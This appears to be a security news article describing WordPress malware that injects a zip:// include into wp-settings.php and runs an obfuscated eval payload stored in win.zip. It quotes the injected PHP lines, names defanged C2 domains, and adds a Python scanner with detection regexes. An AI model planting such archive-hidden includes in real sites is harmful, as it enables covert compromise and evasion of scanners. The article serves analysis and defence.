Cybersecurity analysts have discovered a sophisticated malware operation targeting WordPress sites through an inventive ZIP archive-based attack method.
The malware, initially identified in July 2025, marks a notable progression in web-based threats: it combines advanced obfuscation with inconspicuous persistence tactics to reroute unsuspecting users to harmful domains while concurrently carrying out search engine optimization (SEO) deception.
The assault initiates with the infiltration of essential WordPress files, particularly targeting the crucial wp-settings.php component.
Upon gaining access, attackers inject malevolent code that exploits PHP’s zip:// wrapper capability to execute concealed payloads.
This strategy permits the malware to remain almost undetected by conventional security scanners, as the harmful code resides within what seems to be a benign ZIP archive file named win.zip.
The malware’s main aims extend beyond mere redirection schemes. It orchestrates a thorough assault on search engine rankings via unauthorized content insertion, sitemap adjustments, and the formation of spam-ridden pages designed to elevate harmful websites in search outcomes.
The infection displays impressive sophistication in its capability to differentiate between genuine visitors and automated bots, assuring that search engine crawlers encounter harmless content while actual users are subjected to malign redirects.
Sucuri experts discovered the malware after examining persistent redirect concerns reported by a client, leading to the unearthing of this multi-layered hazard.
The analysts indicated that the malware utilizes dynamic Command and Control server selection, with distinct C2 domains activated based on specific URL patterns encountered by visitors.
ZIP Archive Inclusion Mechanism
The malware’s most innovative aspect lies in its use of PHP’s zip:// stream wrapper for code inclusion. The initial payload, injected into wp-settings.php, comprises two essential lines that establish the framework for the infection:

```php
// strip a leading "www." from the requested hostname
$h = str_replace('www.', '', $_SERVER['HTTP_HOST']);
// include the entry named after that hostname from inside win.zip
include('zip://win.zip#' . $h);
```
This code takes the domain name from the HTTP_HOST header and uses it as the name of the entry to include directly from within the win.zip archive.
The tactic circumvents traditional file-based detection measures, as the malicious code lives inside a compressed container rather than in standalone PHP files.
Upon extraction, the ZIP archive exposes heavily obfuscated PHP code structured as:

```php
// $b2, $b3, $b4 and $string are assigned earlier in the obfuscated payload (not shown in the article)
$encode=$b3($string);
$string1=$b2($b4($encode));
// the leading "?>" closes PHP mode so the decoded string is treated as a fresh PHP file
echo eval("?>" . $string1);
```
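The two indicators above, an include/require that reads through the zip:// wrapper and an eval whose argument opens with "?>", are simple to hunt for on a suspect site. The following scanner is an added example, not code from the article or from Sucuri; it builds a throwaway site tree in a temporary directory containing a constructed wp-settings.php with the injected lines quoted above and a constructed win.zip whose entry is named after a hostname (example.com, an assumption standing in for the victim's domain), then reports both the injected include and any ZIP entry that holds PHP under a non-.php name.

```python
"""Added example: defender-side scanner for the zip:// inclusion pattern.
Not code from the original post or from Sucuri; the sample site it scans
is constructed inline so the script runs offline."""
import os
import re
import tempfile
import zipfile

# include/require (and their _once variants) pulling from the zip:// wrapper
ZIP_INCLUDE_RE = re.compile(
    r"\b(include|require)(_once)?\s*\(?\s*[\"']zip://", re.IGNORECASE)
# eval on a string that starts by closing the PHP tag, as in the extracted payload
EVAL_CLOSE_TAG_RE = re.compile(r"\beval\s*\(\s*[\"']\?>", re.IGNORECASE)
PHP_OPEN_TAG = b"<?php"


def scan_php_file(path):
    """Return the list of indicator names found in one PHP source file."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        src = fh.read()
    hits = []
    if ZIP_INCLUDE_RE.search(src):
        hits.append("zip_wrapper_include")
    if EVAL_CLOSE_TAG_RE.search(src):
        hits.append("eval_close_tag")
    return hits


def scan_zip_archive(path):
    """Return entry names that contain a PHP open tag but are not named *.php.

    The article's payload entry is named after the site's hostname
    (win.zip#<host>), so PHP stored under a non-.php name is the signal."""
    suspicious = []
    try:
        with zipfile.ZipFile(path) as zf:
            for info in zf.infolist():
                if info.is_dir() or info.file_size > 5_000_000:
                    continue
                head = zf.open(info).read(65536)  # only the head is needed for the tag
                if PHP_OPEN_TAG in head and not info.filename.lower().endswith(".php"):
                    suspicious.append(info.filename)
    except zipfile.BadZipFile:
        pass  # not a real archive; nothing to inspect
    return suspicious


def scan_tree(root):
    """Walk a directory; return {relative_path: [indicators]} for every flagged file."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            if name.lower().endswith(".php"):
                hits = scan_php_file(full)
                if hits:
                    findings[rel] = hits
            elif name.lower().endswith(".zip"):
                entries = scan_zip_archive(full)
                if entries:
                    findings[rel] = ["php_in_zip_entry:" + e for e in entries]
    return findings


def build_sample_site():
    """Construct a throwaway site tree reproducing the injection described in the article."""
    root = tempfile.mkdtemp(prefix="wp-sample-")
    # the two injected lines quoted in the article, wrapped in otherwise ordinary code
    with open(os.path.join(root, "wp-settings.php"), "w") as fh:
        fh.write("<?php\n$h = str_replace('www.', '', $_SERVER['HTTP_HOST']);\n"
                 "include('zip://win.zip#' . $h);\nrequire_once ABSPATH . 'wp-load.php';\n")
    # a clean file that must not be flagged
    with open(os.path.join(root, "wp-load.php"), "w") as fh:
        fh.write("<?php\nrequire_once __DIR__ . '/wp-config.php';\n")
    # constructed win.zip: entry named after a hostname (assumed example.com), body in the
    # style of the obfuscated loader
    with zipfile.ZipFile(os.path.join(root, "win.zip"), "w") as zf:
        zf.writestr("example.com",
                    "<?php\n$string1 = 'constructed';\necho eval(\"?>\" . $string1);\n")
    return root


if __name__ == "__main__":
    site = build_sample_site()
    for path, indicators in sorted(scan_tree(site).items()):
        print(f"{path}: {', '.join(indicators)}")
```

Run against a real document root, `scan_tree("/var/www/html")` flags only files that match the two patterns or archives that hide PHP under non-.php names; a legitimate include of a .php file from a ZIP would still be reported by the first regex, which is intentional, since zip:// includes have no place in a stock WordPress install.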
The malware achieves persistence through environment manipulation, setting prolonged execution timeouts and implementing anti-bot detection strategies.
It dynamically chooses from multiple Command and Control servers, including domains like wditemqy[.]enturbioaj[.]xyz and oqmetrix[.]icercanokt[.]xyz, depending on the requested URL path.
This distributed C2 architecture strengthens the malware’s resilience against takedown efforts while allowing targeted content delivery based on visitor behavior.